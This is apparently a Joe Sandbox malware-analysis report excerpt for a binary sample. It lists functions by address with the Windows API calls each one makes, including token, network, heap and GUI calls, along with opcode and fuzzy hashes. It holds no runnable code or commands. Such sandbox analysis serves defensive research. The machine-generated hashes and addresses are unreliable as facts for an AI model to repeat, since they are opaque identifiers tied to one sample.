Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
Instruction ID: 2973952025af683afbaf652597196eb0b77ee17814688135882e4792ee887bd6
Opcode Fuzzy Hash: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
Instruction Fuzzy Hash: CE319335500028FFCF159F58C898EAF7BB5EB09310F44486AF9059B361C735AD50DBA8

Function 00458656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
Part of subcall function 0045810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
Part of subcall function 0045810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
Part of subcall function 0045810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004586A3
_memcmp.LIBCMT ref: 004586C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004586FC
HeapFree.KERNEL32(00000000), ref: 00458703

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
Instruction ID: 730e04a0c9a28b219d77ec22e6a84493cb1498a8cd35620125a6bebab32f77ad
Opcode Fuzzy Hash: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
Instruction Fuzzy Hash: E4215A71E01109EBDB10DFA4C989BAEB7B8EF45306F15405EE844AB242DB34AE09CB58

Function 0042098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 004209AE

Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50

_fprintf.LIBCMT ref: 004209E5
OutputDebugStringW.KERNEL32(?), ref: 00455DBB

Part of subcall function 00424AAA: _flsall.LIBCMT ref: 00424AC3

__setmode.LIBCMT ref: 00420A1A

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
Instruction ID: 506474fa098cb1490a8c63a0929ef03edd2b6c88ff5c0dc42923ee6bdce5b67a
Opcode Fuzzy Hash: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
Instruction Fuzzy Hash: E31126727041146FDB04B2A5BC469BE77A8DF81318FA0416FF105632C3EE3C5946879D

Function 00471767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004717A3

Part of subcall function 0047182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0047184C
Part of subcall function 0047182D: InternetCloseHandle.WININET(00000000), ref: 004718E9

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 0d77803af34525429c563aa5a91095bc3ad4b0cccef2d99c89baa2dfe7cd75a8
Instruction ID: 71b6e4b1fe2b952a6419c9952bf0f018ffc457c15b1f1ac8131077084853f328
Opcode Fuzzy Hash: 0d77803af34525429c563aa5a91095bc3ad4b0cccef2d99c89baa2dfe7cd75a8
Instruction Fuzzy Hash: 1121C235200601BFEB169F648C01FFBBBA9FF48710F10842FF91996660D775D815A7A9

Function 004350E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00435101

Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00C10000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
Instruction ID: 565aca9384bc55ec46628ce6f4316e74187f5c3bb682111b66b5609c454c8c26
Opcode Fuzzy Hash: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
Instruction Fuzzy Hash: D411E072E01A21AECF313FB1BC05B5E3B989B183A5F50593FF9049A250DE3C89418B9C

Function 00476369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50

gethostbyname.WSOCK32(?,?,?), ref: 00476399
WSAGetLastError.WSOCK32(00000000), ref: 004763A4
_memmove.LIBCMT ref: 004763D1
inet_ntoa.WSOCK32(?), ref: 004763DC

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 762733e25637bc439446b3da9c5912462bd92284ca480afd830ba0cdb0608b85
Instruction ID: c304d0e6e06ed5b692ae79d4b0fe9c52f6c8e6d6f1456e813eafe14ad56adccd
Opcode Fuzzy Hash: 762733e25637bc439446b3da9c5912462bd92284ca480afd830ba0cdb0608b85
Instruction Fuzzy Hash: F2114F71600109AFCB00FBA5D946CEE77B9EF04314B54847AF505B72A2DB389E14CB69

Function 00458B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00458B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458BA4

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
Instruction ID: 6d6e4feeaee75d02a1ec4dd614e497ad2765f264ac6e3ed00c825e9843e5ba14
Opcode Fuzzy Hash: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
Instruction Fuzzy Hash: 56113A79900218BFDB10DB95C884EAEBB78EB48710F2041A6E900B7250DA716E15DB94

Function 00401290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
GetClientRect.USER32(?,?), ref: 0043B5FB
GetCursorPos.USER32(?), ref: 0043B605
ScreenToClient.USER32(?,?), ref: 0043B610

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
Instruction ID: ee9d34d9398b5f91fab5137b757b2ab9dbcc007e8162b1c14587a54292e2d527
Opcode Fuzzy Hash: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
Instruction Fuzzy Hash: 39112B39510059FBCB00EF99D8899AE77B8FB05300F4008AAF901F7291D734BA569BA9

Function 0045D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0045D84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0045D864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0045D879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0045D897

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: f854c2ae4ddfb44975126c45fe272911be12f4fa913ee62eb5c826514f2548e5
Instruction ID: 3b05f8a101c890c8fbc83375acaac98503a8deaba450bce75694a4266b83033e
Opcode Fuzzy Hash: f854c2ae4ddfb44975126c45fe272911be12f4fa913ee62eb5c826514f2548e5
Instruction Fuzzy Hash: 48115E75A05304DBE330AF50EC08F97BBBCEF00B01F10896EA926D6151D7B4E94D9BA5

Function 00436FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00436FDB

Part of subcall function 004376C2: __fltout2.LIBCMT ref: 004376EB

__cftog_l.LIBCMT ref: 00437001
__cftoe_l.LIBCMT ref: 00437033

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 3d94be51af7e819a6a5def82be0e086b27bd99855e7e965629bee2c507946819
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 78014EB244414ABBCF2A5E84CC41CEE3F72BB1C354F599416FA9858131D23AD9B1AB85

Function 0048B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0048B2E4
ScreenToClient.USER32(?,?), ref: 0048B2FC
ScreenToClient.USER32(?,?), ref: 0048B320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0048B33B

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
Instruction ID: e0f35f64d62337ec24ef524e52db7040af9c6cc02db1932b8591958b9ea84988
Opcode Fuzzy Hash: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
Instruction Fuzzy Hash: B9117775D00209EFDB01DF99C444AEEBBF5FF18310F104566E914E3220D735AA558F94

Function 00466BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00466BE6

Part of subcall function 004676C4: _memset.LIBCMT ref: 004676F9

_memmove.LIBCMT ref: 00466C09
_memset.LIBCMT ref: 00466C16
LeaveCriticalSection.KERNEL32(?), ref: 00466C26

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
Instruction ID: 06c116e41b1fbc97defe022da98efa456519ca017efd3746de7cd937a477406a
Opcode Fuzzy Hash: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
Instruction Fuzzy Hash: ACF0547A200110BBCF016F56EC85A8ABF29EF45325F4480A9FE085E227D775E811CBB9

Function 00402218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00402231
SetTextColor.GDI32(?,000000FF), ref: 0040223B
SetBkMode.GDI32(?,00000001), ref: 00402250
GetStockObject.GDI32(00000005), ref: 00402258
GetWindowDC.USER32(?,00000000), ref: 0043BE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 0043BE90
GetPixel.GDI32(00000000,?,00000000), ref: 0043BEA9
GetPixel.GDI32(00000000,00000000,?), ref: 0043BEC2
GetPixel.GDI32(00000000,?,?), ref: 0043BEE2
ReleaseDC.USER32(?,00000000), ref: 0043BEED

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
Instruction ID: 54194c7dea5641a5760446fc0b471bd43188e270dcc7ade6c1867ff591c8ccba
Opcode Fuzzy Hash: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
Instruction Fuzzy Hash: 8FE03932104244EADB215FA8EC4D7D93B10EB05332F10837AFB69980E187B54994DB16

Function 00458712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0045871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004582E6), ref: 0045872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458736

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
Instruction ID: 27e516f12521b82670cd12e73380cd235ac9fe5f10b87aab6d4880cb8d6f589a
Opcode Fuzzy Hash: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
Instruction Fuzzy Hash: 69E086366113119FD7205FB45D0CB5B3BACEF55792F244C3CB645D9051DA388449C754

Function 00406240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

%I, xrefs: 0040624E

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID:
String ID: %I
API String ID: 0-63094095
Opcode ID: df8926bba193f86d7530d48bae52e03e3f0f5447670d79ef27430f853165141e
Instruction ID: fc9b66e0bafda5900f64632d1c19c64e360ede111f7e08ffc6918f9b7723571d
Opcode Fuzzy Hash: df8926bba193f86d7530d48bae52e03e3f0f5447670d79ef27430f853165141e
Instruction Fuzzy Hash: F7B19D759001099ACF24EF95C8819EEB7B5EF44314F11403BE942B72D1DB3C9AA6CB9E

Function 0047AEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON

Download Yara Rule

APIs

__itow_s.LIBCMT ref: 0047AFAE

Strings

xbL, xrefs: 0047AFE4
xbL, xrefs: 0047B010

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: __itow_s
String ID: xbL$xbL
API String ID: 3653519197-3351732020
Opcode ID: da92b485cce2626ab64eabfa64daaed038194f15287f05380521b28832e8ebf0
Instruction ID: dfe480003ad9fd5cab9b7df9ebde8448aad3da8901d64dd9d19fd2ed475b7079
